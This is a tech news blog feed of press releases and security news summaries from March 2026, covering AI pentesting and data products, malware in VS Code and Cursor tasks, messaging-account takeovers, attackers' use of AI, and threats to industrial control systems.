Terra Security Redefines Penetration Testing for the AI Era with Terra Portal & Appoints Anna Sarnek as Vice President of Business & Strategy

Posted in Commentary with tags on March 10, 2026 by itnerd

Terra Security, a pioneer in Agentic Offensive Security, today announced the launch of Terra Portal™, its agentic desktop app that serves as an execution layer for pentesters to direct and oversee AI-driven testing in live production environments. Terra Portal reduces the discovery-to-fix cycle for vulnerabilities from the industry average of nearly three months to a matter of hours without sacrificing safety or compliance. As a result, customers can now remediate critical findings well below the Cybersecurity and Infrastructure Agency’s (CISA) 15-day requirements.

Fully autonomous testing tools promise efficiency but introduce security risks and inaccuracies in production environments. Traditional pentesting tools force testers into manual workflows, limiting scalability. Terra Portal resolves this tension by enabling autonomous pentesting to scale through human-governed AI execution.

At the core of Terra Portal is a human-governed, agentic workflow featuring two distinct types of AI agents, each with different responsibilities, operating under different constraints, and governed differently by design. Ambient AI agents autonomously handle recon, code review, test case generation, reachability analysis, pentests, exploitability validation, documentation, and remediation. When complexity, risk, or organizational guardrails require expert judgment, pentesters engage with Copilot AI agents to conduct approved, controlled exploitation and reporting.

For service providers, Terra Portal enables a shift from one-off, project-based engagements to continuous, offensive security services. AI agents autonomously handle execution, while pentesters retain oversight at critical decision points. This model allows providers to support significantly more clients per tester and deliver faster turnaround times, improving customer satisfaction and retention. Governance remains intact, minimizing operational and reputation risk.

Terra Portal integrates natively with Terra’s broader agentic penetration testing platform. The platform uses a coordinated swarm of autonomous AI agents to continuously scope environments, discover attack surfaces, generate hypotheses, and validate vulnerabilities. When those agents encounter limits, the gateway allows human testers to operate within the same agentic workflow, preserving full context and dramatically increasing efficiency.

Early access to Terra Portal is available now. 

The company also announced today the appointment of Anna Sarnek as Vice President of Business & Strategy. Sarnek has served as a strategic advisor to Terra over the past year, helping shape the company’s strategic direction, growth trajectory, and ongoing partnership with Amazon Web Services (AWS).

Sarnek brings more than 15 years of experience spanning cybersecurity, enterprise IT, and cloud partnerships. A trusted advisor to the security community, she most recently led Cyber Startup and Venture Capital Business Development at AWS, where she managed key cyber investor and priority founder relationships to help early and growth-stage companies build strong foundations for scale. With this background, Anna is well-positioned to bridge the gap between Terra and its stakeholders, ensuring the company’s strategies remain closely aligned with evolving market demands and industry trends.

As Vice President of Business & Strategy, Sarnek will complement Terra’s organic momentum by focusing on product innovation, growth strategy, and industry partnerships, leveraging technology companies, the channel, MSSPs, and consulting firms. Drawing on her background in consulting and strategic business development, she will orchestrate alignment across Terra’s business units and partners, ensuring platform strategy, partner feedback, go-to-market execution, and long-term growth move forward in lockstep.

Terra’s approach reflects a broader belief that modern security outcomes require alignment across people, process, and technology. By investing early in trusted ecosystem relationships, from hyperscalers to leading consulting and red teaming firms, Terra is establishing a foundation for comprehensive solutions that resonate with CISOs, executive decision-makers, and frontline practitioners.

SIOS Technology Earns Multiple Industry Honors 

Posted in Commentary with tags on March 10, 2026 by itnerd

SIOS Technology Corp.today announced it has received three prestigious industry recognitions highlighting executive leadership, customer success excellence, and outstanding support performance.

Masahiro Arai, Chief Operating Officer of SIOS Technology, has been named to the South Carolina 500 by the SC Biz News. The South Carolina 500 honors the most influential business leaders across the state, recognizing executives who drive economic growth, innovation, and community impact. Arai’s inclusion reflects his leadership in expanding SIOS’ global presence and advancing its high availability solutions to support mission-critical enterprise environments.

In addition, SIOS Technology’s Vice President of Customer Success, Cassius Rhue, has been named a Silver Stevie® Award winner in the Customer Service Leader of the Year Individual category in the 2025 Stevie Awards for Sales & Customer Service. The Stevie Awards for Sales & Customer Service recognize outstanding achievements by contact centers, customer service, business development, and sales professionals worldwide. Rhue was honored for his leadership in building a high-performing customer success organization focused on proactive engagement, rapid response, and measurable customer outcomes.

Further underscoring the company’s commitment to customer excellence, SIOS Technology was named a Silver winner for Support Department of the Year in the 2025 Best in Biz Awards. The Best in Biz Awards recognize companies, teams, and executives for outstanding performance and innovation across industries. The Support Department of the Year award acknowledges SIOS’ dedication to delivering responsive, expert-level support that ensures customers maintain continuous uptime for their critical applications and databases.

SIOS Technology provides high availability and disaster recovery solutions that protect mission-critical applications in physical, virtual, cloud, and hybrid environments. By combining application-aware intelligence with expert customer engagement, SIOS helps enterprises minimize downtime, reduce operational risk, and maintain business continuity in increasingly complex IT landscapes. With these latest recognitions, SIOS continues to demonstrate leadership not only in technology innovation, but also in customer-centric execution and operational excellence.

Hammerspace and Secuvy Partner to Make At-Scale Data AI-Ready, Fast and Safe, Across On-Premises and Cloud

Posted in Commentary with tags on March 10, 2026 by itnerd

Hammerspace, the high-performance data platform for AI anywhere, today announced a partnership with Secuvy to deliver a “Data-First” approach that turns raw data into secure AI outcomes. Together, the companies unify distributed unstructured data into a global namespace and continuously discover, classify, catalog, and control it across on-premises and cloud. 

Enterprise AI is hitting a hard wall, not just with compute demands, but also due to data sprawl and rising costs with no proven ROI. Unstructured data is fragmented across edge sites, legacy NAS systems, high-performance file systems, object stores and multiple clouds, often governed inconsistently. AI pipelines amplify risk by pulling from large, diverse datasets that may include confidential information. Without continuous discovery and classification, organizations risk exposing sensitive data in AI pipelines, losing track of what was used, and missing high-value insights. 

Together, Hammerspace and Secuvy keep data continuously AI-ready as it changes, so governance and access controls stay current from PoC to production.

  • Hammerspace provides the performance and orchestration layer so AI pipelines can reach distributed file and object data in place and move only what’s needed to the right compute at the right time.
     
  • Secuvy adds the intelligence layer, continuously identifying sensitive data and associated risks so privacy and governance controls can be applied consistently across hybrid and multi-cloud environments.

mage: The Integration of Hammerspace and Secuvy: A Data-First Model that Makes Data AI-Ready

Benefits of Hammerspace and Secuvy Partnership

Hammerspace and Secuvy enable a true Data-First model that makes data AI-ready. The integrated platform understands what the data is, where it lives, and the risk it carries, then controls how it’s used and where it can move, without forcing enterprises to rearchitect projects. Copying data drives up costs and increases risk: when data is duplicated across systems, governance breaks down and auditing, tracking, and securing it becomes difficult, allowing sensitive data to slip into AI pipelines without clear lineage or policy enforcement.

With the Hammerspace + Secuvy “Data-First” integration, organizations can make data AI-ready and enable:
 

  • One Global View – Unify distributed unstructured data into a global namespace across edge, on-premises, and multi-cloud
  • Sensitive Data Visibility – Continuously discover and classify sensitive data (PII/PHI/financial/IP) across file and object stores before it enters AI pipelines
  • Policy-Controlled Access – Catalog and control data in place using policies based on data attributes and risk
  • Continuous Compliance – Maintain consistent security and audit controls as data moves across sites and clouds—without copy-first silos
  • Just-In-Time Data – Move only what’s needed, when it’s needed, with intent-based data movement to compute
  • Use What You Have – Leverage existing storage as the foundation and free data to be processed wherever GPUs are available


Learn More:

Attackers weaponizing VS Code and Cursor tasks to silently infect developer systems

Posted in Commentary with tags on March 9, 2026 by itnerd

Researchers from Abstracts ASTRO research team have uncovered new developments in the evolving “Contagious Interview” campaign, showing how attackers are increasingly abusing developer tools—including Visual Studio Code and the AI coding editor Cursor AI Code Editor—to silently execute malware on developer machines. Here is the blog post: Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains Part 2.

ASTRO analysts detail how attackers are embedding malicious commands into IDE task configuration files. When a developer opens a cloned repository and approves the standard workspace trust prompt, the tasks execute automatically which triggers multi-stage infection chains without requiring the victim to run code manually.

Key findings from the research include:

  • New payload staging infrastructure: Attackers are shifting from previously exposed hosting platforms to GitHub Gists, URL shorteners, and Google Drive to stage malicious scripts and payloads.
  • Developer-focused social engineering: Malicious repositories disguised as interview projects or legitimate development tools execute automatically when opened in an IDE.
  • Multi-stage infection chains: Initial task execution downloads additional loaders and can ultimately deploy infostealers or backdoors targeting browser credentials, crypto wallets, and system data.
  • Evasion tactics: Some payloads are hidden off-screen in configuration files or masquerade as legitimate GPU or driver tooling to avoid detection.

The report also outlines detection opportunities for security teams, including monitoring IDE-spawned shell commands, suspicious use of URL shorteners in configuration files, and unusual process chains involving Node.js and Python runtimes.

Given the growing use of AI-assisted development environments and the trust developers place in their toolchains, researchers warn this technique could become a major new software supply-chain attack vector.

The first blog post about Contagious Interview is here:: https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains.

Russia State Hackers Target Signal & WhatsApp Accounts of Officials & Journalists

Posted in Commentary with tags on March 9, 2026 by itnerd

The Dutch Minister of Defence warns of a cyber campaign linked to Russia that targets accounts on messaging platforms such as Signal and WhatsApp, belonging to government officials, military staff, and journalists.

The Russian campaign is focused on persuading users to divulge their security verification- and pincodes, allowing the hackers to gain access to the users’ Signal or WhatsApp accounts. The most frequently observed method used by the Russian hackers is to masquerade as a Signal Support chatbot in order to induce their targets to divulge their codes. The hackers can then use these codes to take over the user’s account. Another method used by the Russian actors takes advantage of the ‘linked devices’ function within Signal and WhatsApp.

Once an account has been successfully compromised, the hackers can read incoming messages, including messages in the victim’s chat groups. The Russian hackers likely gained access to sensitive information through this campaign.

Ömer Faruk Diken, cybersecurity researcher at SOCRadar:

“Messaging apps such as Signal and WhatsApp are widely used for private and professional communication. Many officials and journalists rely on them because they use end-to-end encryption. However, though encryption protects messages during transmission, it does not prevent attackers from accessing the account itself. If attackers gain control of the account or connect their own device, they can read conversations and collect information from chats and contact lists. For threat actors involved in espionage, this access can provide insight into discussions, contacts, and internal coordination.

“The warning from Dutch officials highlights a cyber campaign that targets messaging accounts used by people who handle sensitive information. By using social engineering and abusing messaging app features, attackers attempt to gain access to private conversations and contacts. Incidents like this also highlight the importance of basic security practices. Users should avoid clicking unknown links, never enter passwords or verification codes on suspicious pages, and always verify the source of requests for sensitive information. Email addresses can also be spoofed, so messages that ask users to click links or provide input should be checked carefully. When possible, organizations should enforce multi-factor authentication to add another layer of protection to communication accounts.

Lydia Atienza, Principal Threat Intelligence Researcher at Outpost24:

“Based on the techniques described in the advisory issued by Dutch intelligence agencies, there is little evidence of particularly novel tradecraft. The methods resemble the same social-engineering tactics long used by financially motivated cybercriminals to compromise messaging accounts. This serves as a reminder that state-linked actors do not always rely on highly sophisticated exploits. In many cases, the same techniques commonly seen in cybercrime can be just as effective in espionage campaigns.”

Additional Resources:

SOCRadar Blog: Russia Targets Signal and WhatsApp Accounts, Dutch Officials Warn

Microsoft Warns Hackers Operationalizing AI to Accelerate Tradecraft 

Posted in Commentary with tags on March 9, 2026 by itnerd

Microsoft has warned that threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. They’re embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations, with the most malicious use of AI centering on using language models for producing text, code, or media.

Microsoft Threat Intelligence has observed that most malicious use of AI today centers on using language models for producing text, code, or media. Threat actors use generative AI to draft phishing lures, translate content, summarize stolen data, generate or debug malware, and scaffold scripts or infrastructure. For these uses, AI functions as a force multiplier that reduces technical friction and accelerates execution, while human operators retain control over objectives, targeting, and deployment decisions.

This dynamic is especially evident in operations likely focused on revenue generation, where efficiency directly translates to scale and persistence. To illustrate these trends, this blog highlights observations from North Korean remote IT worker activity tracked by Microsoft Threat Intelligence as Jasper Sleet and Coral Sleet (formerly Storm-1877), where AI enables sustained, large‑scale misuse of legitimate access through identity fabrication, social engineering, and long‑term operational persistence at low cost.

More details can be found here: https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/

Ensar Seker, CISO at SOCRadar:

“AI is rapidly becoming embedded across the entire cyberattack lifecycle, but not always in the ways people expect. In many cases, threat actors are not building their own advanced AI models; instead, they are operationalizing existing generative AI tools to accelerate traditional attacker workflows. We are seeing AI used to scale reconnaissance, generate convincing phishing content in multiple languages, automate vulnerability research, and refine social engineering campaigns. The real shift is not sophistication alone, it is the speed and scale at which attackers can now execute tasks that previously required significant manual effort.

“The biggest impact of AI in cyber operations is efficiency rather than completely new attack techniques. Attackers are using AI to shorten the time between reconnaissance and exploitation. For example, AI can help analyze large datasets of leaked credentials, generate exploit scripts, or summarize technical documentation for vulnerabilities. This lowers the barrier to entry for less experienced actors while allowing more advanced groups to increase operational tempo and run campaigns in parallel across multiple targets.

“However, AI does not replace traditional attacker tradecraft or eliminate the need for human expertise. Sophisticated campaigns, especially those conducted by nation-state groups, still rely heavily on manual reconnaissance, custom tooling, and operational security discipline. AI is acting more as a force multiplier than a replacement for established tactics. Threat actors still need access, infrastructure, and a clear objective; AI simply helps them move faster once those elements are in place.

“For defenders, the most important takeaway is that AI-driven attacks will increasingly look more polished, personalized, and scalable. Security teams should expect a rise in high-quality phishing, automated reconnaissance against external assets, and AI-assisted malware development. The response should not be panic about AI itself, but investment in visibility, especially around identity, external attack surface, and threat intelligence, so organizations can detect attacker activity early in the intrusion lifecycle before AI-assisted campaigns gain momentum.”

Martin Jartelius, AI Product Director at Outpost24:

“We are seeing the same trend in our own research. In one recent investigation, we observed a threat actor using ChatGPT to assist with vulnerability research related to potential zero-day exploitation. In this case, the attacker’s operational security was weak enough that their activity left a visible trail, giving us rare insight into how generative AI is being used as a ‘research assistant’ during attack preparation. What this highlights is that AI is increasingly acting as a force multiplier for attackers, accelerating reconnaissance, scripting, and vulnerability analysis while lowering the technical barrier to entry.”

AI can do a lot of cool things. But it can also do a lot of bad things if given the chance to. This illustrates the fact that those who defend against attacks should expect more attacks than ever before. Which is of course a bad thing.

Threat Actors Abuse GitHub Notifications to Deliver Vishing Attacks 

Posted in Commentary with tags on March 9, 2026 by itnerd

The Fortra Intelligence and Research Experts (FIRE) team have uncovered a new phishing tactic that abuses legitimate GitHub notification emails to deliver vishing scams. The research shows how attackers are using trusted infrastructure to get malicious messages into inboxes.

Key findings:

  • Attackers hide vishing lures in GitHub commit messages, which generate legitimate notification emails from noreply@github.com.
  • Researchers say this is the first observed use of GitHub commit messages to distribute vishing scams.
  • Notifications are forwarded through Microsoft 365, helping the messages pass authentication checks and evade filters.
  • The lures impersonate brands such as PayPal and Norton and urge victims to call fake support numbers.

The report is published here: https://www.fortra.com/blog/threat-actors-abuse-github-notifications-to-deliver-vishing-attacks

Mega raises $11.5M to give every SMB an enterprise-grade growth team, without the agency

Posted in Commentary with tags on March 9, 2026 by itnerd

Most small to medium business owners have the same relationship with their marketing agency: they pay for effort and hope it turns into outcomes. It rarely feels like a fair trade. Mega is built to fix that. Today, the company announced an $11.5 million Series A to scale a full-service AI growth engine for SMBs – a platform that replaces traditional agencies with a network of AI agents delivering predictable growth without the overhead.

The Series A funding round was led by Goodwater Capital with participation from Andreessen Horowitz, Atreides, SignalFire and Kearny Jackson. It also includes WNBA stars Diana Taurasi, Breanna Stewart, Kelsey Plum and Nneka Ogwumike. 

The problem is structural. SMBs today are expected to compete in a digital ecosystem built for enterprises, across SEO, paid ads, websites, and emerging AI channels. Agencies are expensive relative to SMB budgets, quality varies wildly, execution is manual, and iteration is slow.  At the same time, AI marketing tools have flooded the market, but most still require business owners to learn and operate complex software. Mega takes a different approach by delivering services via software. Instead of managing tools, customers receive execution and measurable performance.

Mega’s core product is an AI-powered growth engine designed specifically for businesses generating roughly $500,000 to $20 million in revenue. The platform uses a network of specialized AI agents to handle SEO, GEO, paid ads, and website management. From the customer’s perspective, it feels like hiring a high-quality growth team, but it runs as software. The system plans, executes, optimizes, and reports continuously. If a customer signs up and never logs in, their marketing still runs and improves.

Mega’s path to market was unplanned. During Covid, the team was building a video game company. When ChatGPT launched, they began experimenting early, building internal AI tools to accelerate their own growth. Organic traffic increased 100 times. Paid customer acquisition costs dropped by 80 percent. When co-founder Lucas Pellan shared the tools with founder friends, the response was immediate and repeated: can we have that. 

With Mega, approximately 55 percent of the work is fully automated, 35 percent is mostly automated with humans in the loop, and 10 percent is executed end to end by humans. This hybrid structure allows Mega to deliver consistent, scalable performance while maintaining quality control. Every campaign feeds data back into the system, improving creative generation, audience targeting, bidding strategies, and optimization logic across the entire customer base.

Mega’s own trajectory reflects the demand for this model. The company went from zero to $10 million in revenue in 10 months. Customers span home services, law firms, healthcare businesses, ecommerce brands, and software companies. 

In one case, Mega helped a Texas medical spa grow search traffic by 174 times. A personal injury law firm increased search visibility by 243 times and began ranking in the top three for key terms. A D2C health brand drove $120,000 in direct website revenue and surpassed its Amazon marketplace performance without increasing ad spend. On average, Mega helps customers grow 20% faster.

The market is massive and underserved. Tens of thousands of marketing agencies serve SMBs across North America, yet most businesses still struggle with unpredictable lead flow, poor ROI, and no visibility into what is working. As digital channels get more competitive and expensive, the gap keeps widening. AI now makes it possible to close it. 

Looking ahead, Mega plans to expand beyond SEO, ads, and websites into managing the entire revenue generation engine for SMBs, including email, outbound, organic social, lead qualification, sales operations, and reporting. The long-term vision is to provide a fully automated growth infrastructure that allows small and mid-sized businesses to compete with enterprise-grade marketing capability, without enterprise overhead.

CData Expands Connect AI Platform with New Agent Tooling and Enterprise-Grade Security

Posted in Commentary with tags on March 9, 2026 by itnerd

CData Software today announced major enhancements to CData Connect AI at the Gartner Data & Analytics Summit (Booth #308). The updates extend CData’s managed Model Context Protocol (MCP) platform with new capabilities across connectivity, context, and control, the three pillars required to move AI from experimentation to production.

Why AI Stalls Before Production

AI investment is accelerating. “Gartner®¹ says worldwide AI spending will total $2.5 trillion in 2026.” But spending isn’t translating into results. Most generative AI initiatives still stall before reaching production. The bottleneck isn’t model capability, it’s the data infrastructure underneath. Without live connectivity to business systems, semantic intelligence that gives data context to AI, and governance controls that enforce security at scale, AI initiatives fail to deliver business value.

CData’s own State of AI Data Connectivity Report reinforces this reality. Only 6% of organizations are satisfied with their current data infrastructure for AI. More than half still rely on custom-built integrations that can’t scale. And 71% of AI teams spend over a quarter of their implementation time on data integration alone, time spent wiring plumbing instead of building intelligence.

Connect AI: Connectivity, Context, and Control in a Single Platform

CData Connect AI is purpose-built to address the data infrastructure gaps that prevent AI from reaching production. Today’s enhancements extend the platform across all three pillars

Connectivity: Connect Gateway and 350+ Data Sources

Connect AI provides live, read-write access to more than 350 business systems, without replication or data movement. The new Connect Gateway extends this reach to data sources behind the firewall, with support for SAP, SQL Server, and PostgreSQL, and more. The result: AI systems can operate against live data regardless of where it resides.

Context: Expanded Agent Tooling and Toolkits

AI agents need business-aware context to choose the right actions and avoid unnecessary MCP tool calls. But exposing too much context creates new risks: increased token usage, model confusion, and unintended access to sensitive data or operations. Connect AI addresses this challenge with a scoped MCP architecture that precisely controls what each agent can see and do. This release introduces three complementary tool types:

  • Universal Tools provide a normalized set of operations that work consistently across all 350+ connected systems. Instead of exposing hundreds of system-specific tools, agents receive a compact, schema-aware interface ideal for data exploration, ad-hoc analysis, and multi-source reasoning — without tool surface bloat.
  • Source Tools expose tightly defined operations specific to each system. These tools map directly to approved system actions, allowing IT teams to enforce predictable execution, transactional safety, and auditability for production workflows.
  • Custom Tools allow organizations to define purpose-built operations tailored to specific workflows. These tools execute pre-optimized queries with explicit data access limits — reducing token usage, improving performance, and eliminating unintended data exposure.

Workspaces define the data boundary for each agent by specifying exactly which datasets, schemas, or views are accessible. New Toolkits define the action boundary by determining which Universal, Source, or Custom Tools are available. Each Workspace and Toolkit combination can be deployed as a dedicated MCP server, ensuring that agents operate only within their intended scope; reducing context noise, strengthening governance, and delivering enterprise-grade control over agent behavior.

Control: SCIM and Custom OAuth Applications

Connect AI enforces per-user authentication with native source-system permissions applied dynamically at runtime, backed by full audit trails. New governance enhancements include SCIM 2.0 for automated identity lifecycle management and Custom OAuth Applications that enable organizations to use first-party credentials to meet internal security and compliance requirements. Every query is authenticated, authorized, and auditable.

The 25% Accuracy Gap: Why Architecture Matters

MCP is becoming the default interface between AI agents and business software. But how accurately do MCP providers actually return data? To find out, CData tested five MCP providers, representing the major architectural approaches in the market, across four sources (CRM, project management, data warehouse, and ERP) using 378 real-world prompts. Every response was scored against pre-established ground truth. No partial credit.

The results revealed a significant accuracy gap. CData Connect AI achieved 98.5% accuracy (67 of 68 correct responses). The other providers ranged from 65% to 75%—failing on one out of every three to four queries. The failures weren’t random: they clustered around relative date logic, multi-filter queries, semantic interpretation of business terms, and write operations, exactly the kinds of tasks AI agents need to perform reliably every day.

For organizations moving beyond copilots toward autonomous agents that read, write, and act on live business data, this gap is decisive. At 75% accuracy, an AI agent fails one out of every four actions. And that inaccuracy compounds: 75% accuracy across a five-step workflow means less than 24% of processes complete successfully. A 75% accuracy rate becomes a 75% failure rate.

Most MCP providers translate natural language directly into API calls, which works for simple lookups but breaks down when queries require date math, multi-condition filtering, or platform-specific business logic. Connect AI uses a relational abstraction layer with semantic intelligence that understands entity relationships, business conventions, and workflow rules. That’s why it maintained near-perfect accuracy across every platform tested, including ERP, where the vendor’s own native MCP server failed completely.

View the full benchmarking methodology and results here: https://www.cdata.com/lp/ai-accuracy-whitepaper/

Organizations deploying AI in production need an accuracy rate that prevents autonomous agents from creating more cleanup work than they save. Connect AI is built to clear that bar because connectivity, context, and control aren’t just platform features. They’re what makes accuracy at scale possible.

CData at Gartner Data & Analytics Summit

CData will be at the Gartner Data & Analytics Summit at Booth #308, where attendees can connect with the team and see the latest in universal data connectivity.

Speaking Session: AI Agents and the Future of Digital Work with Microsoft — CData Chief Product Officer Ken Yagen will take the stage alongside Microsoft Partner Director of Product Management James Oleinik on Wednesday, March 11 (11:15–11:45 AM EDT). The session will present a joint blueprint for moving from AI pilots to production-ready agentic AI, exploring how Copilot Studio and universal data connectivity can deliver the governed infrastructure enterprises need as Gartner predicts 40%+ of agentic AI projects will be canceled by 2027 without the right architecture in place.

Supporting Resources

  • The 25% Accuracy Gap: MCP Provider Performance Across Enterprise Workloads — CData’s benchmark of five MCP providers across 378 enterprise queries found a 25+ percentage point accuracy gap, with CData Connect AI achieving 98.5% accuracy compared to 65–75% for other providers. Download the whitepaper: https://www.cdata.com/lp/ai-accuracy-whitepaper/
  • The State of AI Data Connectivity Report: 2026 Outlook — Based on research with 200+ data and AI leaders and insights from AI pioneers at Microsoft, AWS, and Google, CData’s report found that only 6% of enterprises consider their data infrastructure fully ready for AI — establishing a direct link between data infrastructure maturity and AI success. Download the report: https://www.cdata.com/lp/ai-data-connectivity-report-2026/

¹ Gartner, Inc., “Gartner Says Worldwide AI Spending Will Total $2.5 Trillion in 2026,” Gartner.com (Jan. 15, 2026), accessed Feb. 20, 2026, https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026
GARTNER is a trademark of Gartner, Inc. and/or its affiliates.

How the February 28 Strikes Triggered a New Wave of AI-Assisted Attacks on US Critical Infrastructure

Posted in Commentary with tags on March 9, 2026 by itnerd

CloudSEK has posted a pair of research reports that are highly relevant to the cyber dimension of the Iran-US conflict, especially in light of developments since the February 28 strikes.

Following the February 28 US-Israel strikes on Iran, CloudSEK has documented an immediate and significant surge in Iranian-aligned cyber activity targeting US critical infrastructure, with AI now acting as a direct force multiplier for threat actors.

The key findings:

  • Over 60 Iranian-aligned hacktivist groups activated on Telegram within hours of the February 28 strikes, the largest single-event mobilization of this ecosystem ever recorded.
  • An Electronic Operations Room was formed on Telegram to coordinate attacks, operating on ideological initiative rather than central state direction, which makes activity harder to predict and constrain.
  • More than 40,000 US industrial control systems are currently reachable on the public internet, many with default or no credentials, representing an immediately exploitable attack surface.
  • CloudSEK researchers demonstrated that an actor with no prior ICS knowledge can move from intent to a working list of accessible US industrial targets in under five minutes using AI tools and passive reconnaissance. No scanning, no exploitation, no specialist knowledge required.
  • The same AI platforms now embedded in US defense operations are accessible to threat actors for offensive reconnaissance, creating a dual-use dynamic that significantly widens the threat.

Both reports are primary-sourced, technically detailed, and directly tied to the current conflict escalation. The full write-ups are here:

Report 1: AI, the Iran-US Conflict, and the Threat to US Critical Infrastructure
https://www.cloudsek.com/blog/ai-the-iran-us-conflict-and-the-threat-to-us-critical-infrastructure

Report 2: Threat Actor Landscape Assessment of ICS/OT Targeting in the 2026 Iran-US Conflict
https://www.cloudsek.com/blog/a-threat-actor-landscape-assessment-of-ics-ot-targeting-in-the-2026-iran-us-conflict-and-the-scale-of-the-risk